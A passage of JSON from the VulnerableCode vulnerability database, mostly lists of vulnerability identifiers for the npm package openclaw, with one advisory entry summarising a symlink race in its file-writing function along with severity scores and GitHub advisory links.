vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-392f-ggf5-fp3c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s66b-8pbe-2kb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50512?format=json","vulnerability_id":"VCID-zm2t-r33r-fffy","summary":"OpenClaw's TOCTOU symlink race in writeFileWithinRoot could create or truncate files outside root boundaries\nA symlink-retarget TOCTOU race in `writeFileWithinRoot` could point an attacker-controlled path alias outside the configured root between resolution and write operations.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-x82f-27x3-q89c","reference_id":"GHSA-x82f-27x3-q89c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x82f-27x3-q89c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x82f-27x3-q89c","reference_id":"GHSA-x82f-27x3-q89c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x82f-27x3-q89c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{